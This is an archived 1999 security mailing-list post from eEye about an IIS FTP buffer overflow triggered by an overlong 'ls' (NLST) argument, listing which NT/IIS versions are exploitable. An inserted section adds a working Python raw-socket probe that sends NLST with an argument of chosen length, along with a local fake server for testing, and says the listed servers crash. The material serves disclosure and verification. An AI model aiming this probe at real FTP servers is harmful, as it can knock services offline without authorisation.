IIS Advisory Update

From: Marc (Marcat_private)
Date: Sun Jan 24 1999 - 19:42:16 PST


    I am still receiving e-mails such as:
    
    >Not to burst anyone's bubble, or I'm doing it wrong, but in testing my ftp
    >server at my office, which is an NT 4.0 SP3, IIS 4.0 box, I can't even put in
    >that many letters to make it crash..
    Please understand that the above is a client-side restriction.
    
    The only valid e-mail I have gotten, and one that has pretty much been proven
    so far, was from Mnemonix, where he couldn't reproduce the overflow on NT 4
    Server IIS 4 (installed from the NT 4 Option Pack) with Service Pack 3 and no
    hotfixes. He used telnet to establish the session to the FTP server and then
    issued the PORT command and had netcat listen on the port. He then tried the
    overflow and it did not work. This very well may be true because we did not
    test SP3. There seem to be some mixed findings... some I am not sure if the
    people e-mailing me are doing it wrong, and some could be configuration
    differences. Whichever the case, it's up to Microsoft to fix the problem. We
    do know positively the following:
    
    NT + Option Pack 4 (IIS 4) + SP4 is exploitable
    NT + IIS 3 + SP4 is exploitable
    PWS 1.0 is exploitable.
    
    I am going to go pass out now.
    
    Signed,
    Marc
    eEye Digital Security Team
    www.eEye.com
    
    P.S.
    Some of the Unix ftp clients also malform the request, so even though to the
    eye it looks like it's sending the correct "ls (aaa...)", it doesn't send it
    correctly. Same goes for NT 4.0's ftp.exe and a few others.
    
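The point Marc keeps making is that a stock ftp client (ftp.exe, several Unix clients) either refuses a long "ls" argument or rewrites it before it goes on the wire, so a failed reproduction with such a client proves nothing. The way to check what the server actually receives is to speak FTP over a raw socket, exactly as Mnemonix did with telnet plus a netcat listener for the PORT data connection. The following is an added example, not code from the advisory or from eEye: it is a raw-socket probe that logs in, opens a local data listener, sends a PORT command for it, then sends an NLST line (the command a BSD-style client sends for "ls") with an argument of any length you choose, and reports the server's reply. To keep it runnable offline it also includes a constructed fake FTP server that records the NLST line it received, so you can confirm byte-for-byte that the full argument arrived. The host, ports, credentials and filler byte are assumptions; against a real target you would replace the fake server with the machine under test and watch whether the 150 reply arrives at all.

```python
import socket
import threading


def port_command(ip, port):
    """Build an RFC 959 PORT line (h1,h2,h3,h4,p1,p2) for a local listener."""
    h = ip.split(".")
    return "PORT %s,%s,%s,%s,%d,%d\r\n" % (h[0], h[1], h[2], h[3], port >> 8, port & 0xFF)


def nlst_line(arg_len, filler=b"A"):
    """The 'ls <arg>' request as a BSD-style client sends it: NLST plus the argument.
    Built directly so no client-side length limit or rewriting can touch it."""
    return b"NLST " + filler * arg_len + b"\r\n"


def send_raw_ftp_probe(host, ctrl_port, arg_len, user=b"anonymous",
                       password=b"test@example.com", timeout=5.0):
    """Telnet-style FTP session over a raw socket: USER/PASS, PORT to a local
    listener (the netcat role), then one NLST with an arg_len-byte argument.
    Returns the bytes sent on that line and every reply seen."""
    data_listener = socket.socket()
    data_listener.bind(("127.0.0.1", 0))
    data_listener.listen(1)
    data_port = data_listener.getsockname()[1]

    s = socket.create_connection((host, ctrl_port), timeout=timeout)
    f = s.makefile("rb")
    replies = {"banner": f.readline()}
    s.sendall(b"USER " + user + b"\r\n")
    replies["user"] = f.readline()
    s.sendall(b"PASS " + password + b"\r\n")
    replies["pass"] = f.readline()
    s.sendall(port_command("127.0.0.1", data_port).encode("ascii"))
    replies["port"] = f.readline()

    line = nlst_line(arg_len)
    s.sendall(line)
    try:
        # On a healthy server this is a 150/226 or a 550; on the servers the
        # advisory lists the service dies instead and nothing comes back.
        replies["nlst"] = f.readline()
    except socket.timeout:
        replies["nlst"] = b""
    try:
        s.sendall(b"QUIT\r\n")
    except OSError:
        pass
    s.close()
    data_listener.close()
    return {"sent_len": len(line), "replies": replies}


def run_fake_ftp_server(ready, captured):
    """Constructed stand-in for the target: minimal USER/PASS/PORT dialogue that
    records the raw NLST/LIST line so the test can measure what really arrived."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    ready["port"] = srv.getsockname()[1]
    ready["event"].set()
    conn, _ = srv.accept()
    f = conn.makefile("rb")
    conn.sendall(b"220 fake ftp ready\r\n")
    for line in f:
        cmd = line.split(b" ", 1)[0].strip().upper()
        if cmd == b"USER":
            conn.sendall(b"331 send password\r\n")
        elif cmd == b"PASS":
            conn.sendall(b"230 logged in\r\n")
        elif cmd == b"PORT":
            conn.sendall(b"200 PORT ok\r\n")
        elif cmd in (b"NLST", b"LIST"):
            captured["line"] = line
            conn.sendall(b"150 opening data connection\r\n")
        elif cmd == b"QUIT":
            conn.sendall(b"221 bye\r\n")
            break
    conn.close()
    srv.close()


def demo(arg_len=2000):
    """Run the probe against the fake server and compare bytes sent vs. received."""
    ready = {"event": threading.Event()}
    captured = {}
    t = threading.Thread(target=run_fake_ftp_server, args=(ready, captured), daemon=True)
    t.start()
    ready["event"].wait(5)
    result = send_raw_ftp_probe("127.0.0.1", ready["port"], arg_len)
    t.join(5)
    result["server_saw_len"] = len(captured.get("line", b""))
    return result


if __name__ == "__main__":
    r = demo(2000)
    print("sent %d bytes, server received %d bytes, reply %r"
          % (r["sent_len"], r["server_saw_len"], r["replies"]["nlst"]))
```

The useful check is the last line of output: when sent_len and server_saw_len match, the length limit seen with an interactive client was the client's, not the server's, and the mixed reports Marc describes can be narrowed down to server configuration or service-pack level rather than to how the request was typed.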



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:30:46 PDT